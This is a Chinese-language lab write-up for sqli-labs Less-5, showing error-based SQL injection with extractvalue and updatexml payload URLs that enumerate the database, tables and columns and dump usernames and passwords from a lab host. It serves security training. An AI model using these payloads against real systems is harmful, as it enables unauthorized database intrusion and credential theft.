sqli-labs less5 Double Query- Single Quotes- String

?id=1

无回显

考虑报错注入

(1)判断字符型还是数字型

http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%201–+

http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%202–+

字符型而且是单引号闭合

(2)判断字段个数:

http://39.101.162.123:10067/Less-5/?id=1%27%20order%20by%201,2,3,4–+

所以是3个字段

(3)尝试报错注入

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select version()))) --+

(4)爆库名:
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select database()))) --+

XPATH syntax error: ‘~security’

(5)爆表名:
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) --+

这里特别注意,一定要加limit 0,1 因为报错的信息不止一行,无法回显多行数据

XPATH syntax error: ‘~emails’

查询剩下的表:
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1))) --+

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 2,1))) --+

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1))) --+

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 4,1))) --+

所以一共4个表。

下面对users表进行字段名的查询:

(6)爆字段名:

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1))) --+

XPATH syntax error: '~id’

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 1,1))) --+

XPATH syntax error: '~username’

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 2,1))) --+

XPATH syntax error: '~password’

三个字段全部爆完:id,username,password

(7)爆数据:

这里就不繁琐的爆了,简单就爆第一个数据

http://39.101.162.123:10067/Less-5/?id=1’or updatexml(1,concat(0x7e,(select group_concat(id,0x3a,username,0x3a,password) from users )),0)or’ --+

这里就爆了第一个数据和部分第二个数据:

XPATH syntax error: ‘~1:Dumb:Dumb,2:Angelina:I-kill-y’

报错注入_sqli-labs less5 Double Query- Single Quotes- String相关推荐

  1. SQLi LABS Less-5 报错注入+布尔盲注

    第五关是单引号字符型注入,推荐使用报错注入.布尔盲注 方式一:报错注入 推荐文章:报错注入使用详解,原理+步骤+实战教程 第一步.判断注入点 地址栏输入:?id=1' 单引号导致,页面显示数据库的报错 ...

  2. mysql less6教程_Sqli labs系列-less-56 报错注入法(上)

    睡了一下午,晚上也没啥事,还特别精神,就想着,要不继续做做这个系列第五关和第六关吧,在我一系列常规的测试后发现,第五关和第六关,是属于报错注入的关卡,两关的区别是一个是单引号一个是双引号...当然我是 ...

  3. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  4. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  5. SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注

    第26关是单引号字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...

  6. SQLi LABS Less 23 联合注入+报错注入+布尔盲注

    第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...

  7. SQLi LABS Less-11 联合注入+报错注入

    第十一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入: a' or 1 -- a 密码随便输入: ...

  8. SQLi LABS Less-6 报错注入+布尔盲注

    第六关是双引号字符型注入,推荐使用报错注入.布尔盲注 方式一:报错注入 推荐文章:报错注入使用详解,原理+步骤+实战教程 第一步.判断注入点 地址栏输入:?id=1" 页面显示数据库的报错信 ...

  9. SQLi LABS Less 17 报错注入

    第十七关单引号字符型注入 ,推荐使用报错注入. 一.功能分析 这关是一个修改密码的功能,先查询用户名是否正确. 如果用户名正确,后台就修改密码,并提示修改成功: 如果用户名错误,页面就直接返回修改失败 ...

最新文章

  1. 比尔·盖茨官宣离婚!除了孩子和基金会,一切都是浮云
  2. tomcat7在eclipse中,调试时断点频繁停在threadpoolexecutor
  3. css画横线箭头_用CSS绘制三角形箭头
  4. centos内核参数优化
  5. php用a什么软件来下载,AMQB官方PHP库
  6. golang生成c-shared so供c语言或者golang调用到例子
  7. php mui.picker,www MUI框架里边有很多例子教你如何使用 开发手机界面 WEB(ASP,PHP,...) 251万源代码下载- www.pudn.com...
  8. WCF测试工具,post经验
  9. HDU4025 Equation of XOR [二分+状态压缩]
  10. 接口测试实战总结,绝对值得收藏
  11. 时间操作(Java版)—将毫秒转换为年月日时分秒
  12. Hadoop2.2.0 + HBase0.96 伪分布式安装
  13. 新产品开发过程基本原则
  14. Samtools说明文档网址变更
  15. 织梦(dedecms)标签大全(非常全面)
  16. san-miguelbunny
  17. 拿番茄炒鸡蛋来讲解一下大数据项目的流程
  18. Ubuntu18.04安装ax200网卡驱动以及更新内核
  19. 机器学习——EM和GMM(基于李航老师的推导)
  20. python 量化分析 入门_量化入门-小白到菜鸟的学习路线

热门文章

  1. 如何获取微信API的Access Token
  2. IBASE category 设置为01的情况下 IBASE自动创建情况
  3. SAP UI5 CreateBindingContext 方法的实现逻辑
  4. 一些SAP UI5代码审查的例子
  5. ts获取服务器数据_基于Nginx的媒体服务器技术-线上公开课
  6. 以下不能在python编译环境_win7 下解决python 集成编译环境IDLE无法打开的问题。...
  7. python语言基础项目报告书_25个Python学习项目,值得推荐
  8. 安装cuda 非root_linux非root用户下安装软件,搭建生产环境
  9. 中原工学院c语言期末考试题,中原工学院软件学院 2010年C语言 试卷A
  10. ubuntu mysql innodb_Ubuntu MYSQL环境搭建